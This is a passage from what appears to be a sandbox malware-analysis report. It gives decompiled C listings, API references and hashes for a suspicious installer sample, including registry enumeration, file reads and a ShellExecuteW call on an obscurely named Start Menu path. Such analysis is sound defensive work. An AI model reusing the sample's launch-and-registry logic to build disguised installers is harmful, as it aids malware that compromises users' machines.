                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                    • String ID:
                                                    • API String ID: 334405425-0
                                                    • Opcode ID: b3cd42d63d393468e031196d0d0358a06b88db803df80fe8d90d1e531fa02489
                                                    • Instruction ID: e4abfbb00710fbb49cfbee30f6c47c6475fc16ace361a0eeed54ffc6686eb32c
                                                    • Opcode Fuzzy Hash: b3cd42d63d393468e031196d0d0358a06b88db803df80fe8d90d1e531fa02489
                                                    • Instruction Fuzzy Hash: EB21AD71900215EBCF206FA5CE4999E7971BF04358F60453BF511B51E0CBBD8982DA6D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E00401B71(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x40cddc; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x24)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E00406234(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x28)));
						_t12 =  *0x40cddc; // 0x0
						 *_t34 = _t12;
						 *0x40cddc = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t30 + 4; // 0x4
							E00406212(_t33, _t3);
							_push(_t30);
							 *0x40cddc =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t30 == _t28) {
							break;
						}
						_t30 =  *_t30;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t30 == _t28) {
								break;
							} else {
								_t32 = _t30 + 4;
								_t36 = L"Call";
								E00406212(_t36, _t30 + 4);
								_t22 =  *0x40cddc; // 0x0
								E00406212(_t32, _t22 + 4);
								_t25 =  *0x40cddc; // 0x0
								_push(_t36);
								_push(_t25 + 4);
								E00406212();
								L15:
								 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E00406234(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405957();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}














                                                    0x00401b71
                                                    0x00401b71
                                                    0x00401b74
                                                    0x00401b7c
                                                    0x00401bc5
                                                    0x00401bf3
                                                    0x00401bfc
                                                    0x00401bfe
                                                    0x00401c02
                                                    0x00401c07
                                                    0x00401c0c
                                                    0x00401c0e
                                                    0x00401bc7
                                                    0x00401bc9
                                                    0x004028a1
                                                    0x00401bcf
                                                    0x00401bcf
                                                    0x00401bd4
                                                    0x00401bdb
                                                    0x00401bdc
                                                    0x00401be1
                                                    0x00401be1
                                                    0x00401bc9
                                                    0x00000000
                                                    0x00401b7e
                                                    0x00401b7e
                                                    0x00401b7e
                                                    0x00401b81
                                                    0x00000000
                                                    0x00000000
                                                    0x00401b87
                                                    0x00401b8b
                                                    0x00000000
                                                    0x00401b8d
                                                    0x00401b8f
                                                    0x00000000
                                                    0x00401b95
                                                    0x00401b95
                                                    0x00401b98
                                                    0x00401b9f
                                                    0x00401ba4
                                                    0x00401bae
                                                    0x00401bb3
                                                    0x00401bb8
                                                    0x00401bbc
                                                    0x004029f7
                                                    0x00402adb
                                                    0x00402ade
                                                    0x00402ae4
                                                    0x00402ae4
                                                    0x00401b8f
                                                    0x00000000
                                                    0x00401b8b
                                                    0x004022e4
                                                    0x004022f1
                                                    0x004022f2
                                                    0x004022f7
                                                    0x004022f7
                                                    0x00402ae6
                                                    0x00402aea

                                                    APIs
                                                    • GlobalFree.KERNEL32(00000000), ref: 00401BE1
                                                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Global$AllocFree
                                                    • String ID: Call
                                                    • API String ID: 3394109436-1824292864
                                                    • Opcode ID: b51a66c0233ca6a946c6f8143c14dd9a4c9c03e2d9b40e0510177e722d14fe01
                                                    • Instruction ID: bfeac54a7e569f0ef8803044b169413d496b9424a5b862e02772d0402316afe5
                                                    • Opcode Fuzzy Hash: b51a66c0233ca6a946c6f8143c14dd9a4c9c03e2d9b40e0510177e722d14fe01
                                                    • Instruction Fuzzy Hash: 5521AE72A44140EBCB20EBD48E8495E77B9EF94318B21457BF502B72D0DBB89851DF2D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402511 Relevance: 4.5, APIs: 3, Instructions: 46registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E00402511(int* __ebx, intOrPtr __edx, short* __esi) {
				int _t9;
				long _t12;
				int* _t15;
				intOrPtr _t20;
				void* _t21;
				short* _t23;
				void* _t25;
				void* _t28;

				_t23 = __esi;
				_t20 = __edx;
				_t15 = __ebx;
				_t21 = E00402D5D(_t28, 0x20019);
				_t9 = E00402C31(3);
				 *((intOrPtr*)(_t25 - 0x50)) = _t20;
				 *__esi = __ebx;
				if(_t21 == __ebx) {
					L7:
					 *((intOrPtr*)(_t25 - 4)) = 1;
				} else {
					 *(_t25 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t25 - 0x18)) == __ebx) {
						_t12 = RegEnumValueW(_t21, _t9, __esi, _t25 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t12;
						if(_t12 != 0) {
							goto L7;
						} else {
							goto L4;
						}
					} else {
						RegEnumKeyW(_t21, _t9, __esi, 0x3ff); // executed
						L4:
						_t23[0x3ff] = _t15;
						_push(_t21); // executed
						RegCloseKey(); // executed
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t25 - 4));
				return 0;
			}











                                                    0x00402511
                                                    0x00402511
                                                    0x00402511
                                                    0x0040251d
                                                    0x0040251f
                                                    0x00402527
                                                    0x0040252a
                                                    0x0040252d
                                                    0x004028a1
                                                    0x004028a1
                                                    0x00402533
                                                    0x0040253b
                                                    0x0040253e
                                                    0x00402557
                                                    0x0040255d
                                                    0x0040255f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00402540
                                                    0x00402544
                                                    0x00402565
                                                    0x00402565
                                                    0x0040256c
                                                    0x0040256d
                                                    0x0040256d
                                                    0x0040253e
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                      • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,00000529,00000000,00000022,00000000,?,?), ref: 00402D85
                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402544
                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402557
                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsg51C2.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Enum$CloseOpenValue
                                                    • String ID:
                                                    • API String ID: 167947723-0
                                                    • Opcode ID: 4e7fd3a712cc9cbb5b80ed83b1fd4f6a0cbce464ae38ce17810aecde3c8c741d
                                                    • Instruction ID: bf3b2bcb6287721b49d379c1e5eb9bed13c1d22dc32754f1d9800637ac4e69b6
                                                    • Opcode Fuzzy Hash: 4e7fd3a712cc9cbb5b80ed83b1fd4f6a0cbce464ae38ce17810aecde3c8c741d
                                                    • Instruction Fuzzy Hash: 44018F71A04204ABE7109FA59E8CABF766CEF40388F10443EF506A61D0EAF84E419629
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401E77 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E00401E77() {
				short* _t6;
				void* _t16;
				void* _t19;
				void* _t26;

				_t24 = E00402C53(_t19);
				_t6 = E00402C53(0x31);
				_t22 = E00402C53(0x22);
				E00402C53(0x15);
				E00401423(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t16 = ShellExecuteW( *(_t26 - 8),  ~( *_t5) & _t24, _t6,  ~( *_t7) & _t22, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93\\Vatersotiges\\Knoglemarvsundersgelsen\\Armoniac",  *(_t26 - 0x1c)); // executed
				if(_t16 < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}







                                                    0x00401e7f
                                                    0x00401e81
                                                    0x00401e91
                                                    0x00401e93
                                                    0x00401e9a
                                                    0x00401ea8
                                                    0x00401eb8
                                                    0x00401ec1
                                                    0x00401eca
                                                    0x004028a1
                                                    0x004028a1
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac,?), ref: 00401EC1
                                                    Strings
                                                    • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac, xrefs: 00401EAA
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ExecuteShell
                                                    • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac
                                                    • API String ID: 587946157-3132586757
                                                    • Opcode ID: a4c45d0e93e81c5669d13ae12dfb28be7a178a2c91bccf0d6200d5c50c486aad
                                                    • Instruction ID: 3dcdd3b781ba8ea7f848cddc5e889496084bd88ab3ad0d62e4dc7728c2b1bbdb
                                                    • Opcode Fuzzy Hash: a4c45d0e93e81c5669d13ae12dfb28be7a178a2c91bccf0d6200d5c50c486aad
                                                    • Instruction Fuzzy Hash: 35F0C835704511A7DB107BB5DE4AA9D3264DB40758F208576F901F71D1DAFCC9829628
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 16%
                                                    			E100028A4(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t31;
				void* _t32;
				int _t36;
				void* _t40;
				void* _t49;
				void* _t54;
				void* _t58;
				signed int _t65;
				void* _t70;
				void* _t79;
				intOrPtr _t81;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				void* _t92;
				void* _t94;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t106;
				intOrPtr _t107;

				if( *0x10004050 != 0 && E10002823(_a4) == 0) {
					 *0x10004054 = _t106;
					if( *0x1000404c != 0) {
						_t106 =  *0x1000404c;
					} else {
						E10002DE0(E1000281D(), __ecx);
						 *0x1000404c = _t106;
					}
				}
				_t31 = E1000285F(_a4);
				_t107 = _t106 + 4;
				if(_t31 <= 0) {
					L9:
					_t32 = E10002853();
					_t81 = _a4;
					_t90 =  *0x10004058;
					 *((intOrPtr*)(_t32 + _t81)) = _t90;
					 *0x10004058 = _t81;
					E1000284D();
					_t36 = ReadFile(??, ??, ??, ??, ??); // executed
					 *0x10004034 = _t36;
					 *0x10004038 = _t90;
					if( *0x10004050 != 0 && E10002823( *0x10004058) == 0) {
						 *0x1000404c = _t107;
						_t107 =  *0x10004054;
					}
					_t91 =  *0x10004058;
					_a4 = _t91;
					 *0x10004058 =  *((intOrPtr*)(E10002853() + _t91));
					_t40 = E10002831(_t91);
					_pop(_t92);
					if(_t40 != 0) {
						_t49 = E1000285F(_t92);
						if(_t49 > 0) {
							_push(_t49);
							_push(E1000286A() + _a4 + _v8);
							_push(E10002874());
							if( *0x10004050 <= 0 || E10002823(_a4) != 0) {
								_pop(_t101);
								_pop(_t54);
								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t102);
								_pop(_t58);
								 *0x1000404c =  *0x1000404c +  *(_t102 + _t58) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x10004058 == 0) {
						 *0x1000404c = 0;
					}
					_t94 = _a4 + E1000286A();
					 *(E10002878() + _t94) =  *0x10004034;
					 *((intOrPtr*)(E1000287C() + _t94)) =  *0x10004038;
					E1000288C(_a4);
					if(E1000283F() != 0) {
						 *0x10004068 = GetLastError();
					}
					return _a4;
				}
				_push(E1000286A() + _a4);
				_t65 = E10002870();
				_v8 = _t65;
				_t88 = _t31;
				_push(_t77 + _t65 * _t88);
				_t79 = E1000287C();
				_t100 = E10002878();
				_t103 = E10002874();
				_t70 = _t88;
				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
					_push( *((intOrPtr*)(_t79 + _t70)));
				}
				_push( *((intOrPtr*)(_t100 + _t70)));
				asm("loop 0xfffffff1");
				goto L9;
			}


























                                                    0x100028b4
                                                    0x100028c5
                                                    0x100028d2
                                                    0x100028e6
                                                    0x100028d4
                                                    0x100028d9
                                                    0x100028de
                                                    0x100028de
                                                    0x100028d2
                                                    0x100028ef
                                                    0x100028f4
                                                    0x100028fa
                                                    0x1000293e
                                                    0x1000293e
                                                    0x10002943
                                                    0x10002948
                                                    0x1000294e
                                                    0x10002950
                                                    0x10002956
                                                    0x10002963
                                                    0x10002965
                                                    0x1000296a
                                                    0x10002977
                                                    0x1000298a
                                                    0x10002990
                                                    0x10002996
                                                    0x10002997
                                                    0x1000299d
                                                    0x100029a9
                                                    0x100029af
                                                    0x100029b7
                                                    0x100029b8
                                                    0x100029bb
                                                    0x100029c6
                                                    0x100029c8
                                                    0x100029d4
                                                    0x100029da
                                                    0x100029e2
                                                    0x10002a0e
                                                    0x10002a0f
                                                    0x10002a15
                                                    0x10002a15
                                                    0x10002a1c
                                                    0x100029f2
                                                    0x100029f2
                                                    0x100029f3
                                                    0x10002a01
                                                    0x10002a0a
                                                    0x10002a0a
                                                    0x100029e2
                                                    0x100029c6
                                                    0x10002a25
                                                    0x10002a27
                                                    0x10002a27
                                                    0x10002a39
                                                    0x10002a46
                                                    0x10002a54
                                                    0x10002a5a
                                                    0x10002a68
                                                    0x10002a70
                                                    0x10002a70
                                                    0x10002a7e
                                                    0x10002a7e
                                                    0x10002905
                                                    0x10002906
                                                    0x1000290b
                                                    0x1000290f
                                                    0x10002914
                                                    0x10002928
                                                    0x10002929
                                                    0x1000292a
                                                    0x1000292c
                                                    0x10002931
                                                    0x10002933
                                                    0x10002933
                                                    0x10002936
                                                    0x1000293c
                                                    0x00000000

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39674247886.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000001.00000002.39674168804.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674313518.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674359830.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastRead
                                                    • String ID:
                                                    • API String ID: 1948546556-0
                                                    • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                    • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                    • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                    • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040317B Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E0040317B(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a298;
					 *0x418ed4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403283(4);
				if(_t22 >= 0) {
					_t24 = E00405E6A( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x418ed4 =  *0x418ed4 + 4;
						_t36 = E00403283(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x418ed4 =  *0x418ed4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E00405E6A( *0x40a01c, 0x414ed0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E00405E99(_a8, 0x414ed0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x418ed4 =  *0x418ed4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                                                    0x0040317f
                                                    0x00403188
                                                    0x00403191
                                                    0x00403195
                                                    0x004031a0
                                                    0x004031a0
                                                    0x004031a8
                                                    0x004031af
                                                    0x004031c1
                                                    0x004031c8
                                                    0x0040326d
                                                    0x0040326d
                                                    0x00000000
                                                    0x004031ce
                                                    0x004031d1
                                                    0x004031dd
                                                    0x004031e1
                                                    0x0040327b
                                                    0x0040327b
                                                    0x004031e7
                                                    0x004031ea
                                                    0x00403249
                                                    0x0040324f
                                                    0x00403251
                                                    0x00403251
                                                    0x00403263
                                                    0x0040326b
                                                    0x00403272
                                                    0x00403275
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004031ec
                                                    0x004031ef
                                                    0x00000000
                                                    0x004031f5
                                                    0x004031fa
                                                    0x00403201
                                                    0x00403204
                                                    0x00403206
                                                    0x00403206
                                                    0x00403213
                                                    0x00403216
                                                    0x0040321d
                                                    0x00000000
                                                    0x00000000
                                                    0x00403226
                                                    0x0040322d
                                                    0x00403245
                                                    0x0040326f
                                                    0x0040326f
                                                    0x0040322f
                                                    0x0040322f
                                                    0x00403232
                                                    0x00403235
                                                    0x0040323b
                                                    0x00403241
                                                    0x00000000
                                                    0x00403243
                                                    0x00000000
                                                    0x00403243
                                                    0x00403241
                                                    0x00000000
                                                    0x0040322d
                                                    0x00000000
                                                    0x004031fa
                                                    0x004031ef
                                                    0x004031ea
                                                    0x004031e1
                                                    0x004031c8
                                                    0x0040327d
                                                    0x00403280

                                                    APIs
                                                    • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004031A0
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                    • Instruction ID: 40ace49db037ace229a3e5c96781d28ed7fa856bf3440834985399bb1b02b3fc
                                                    • Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                    • Instruction Fuzzy Hash: 65316B30601219EBDF10DFA5ED84ADA3E68FF04799F20417EF905E6190D7788E509BA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040249D Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 84%
                                                    			E0040249D(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402D5D(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C53(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x50) = 0x800;
					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x50) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E00406159(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33); // executed
					RegCloseKey(); // executed
				}
				 *0x42a2c8 =  *0x42a2c8 +  *(_t37 - 4);
				return 0;
			}








                                                    0x0040249d
                                                    0x0040249d
                                                    0x004024a2
                                                    0x004024a9
                                                    0x004024ab
                                                    0x004024b2
                                                    0x004024b5
                                                    0x004028a1
                                                    0x004024bb
                                                    0x004024be
                                                    0x004024d9
                                                    0x00402509
                                                    0x00402509
                                                    0x0040250c
                                                    0x004024db
                                                    0x004024df
                                                    0x004024f8
                                                    0x004024ff
                                                    0x00402502
                                                    0x004024e1
                                                    0x004024e4
                                                    0x004024ef
                                                    0x00402565
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004024e4
                                                    0x004024df
                                                    0x0040256c
                                                    0x0040256d
                                                    0x0040256d
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                      • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,00000529,00000000,00000022,00000000,?,?), ref: 00402D85
                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024CE
                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsg51C2.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID:
                                                    • API String ID: 3677997916-0
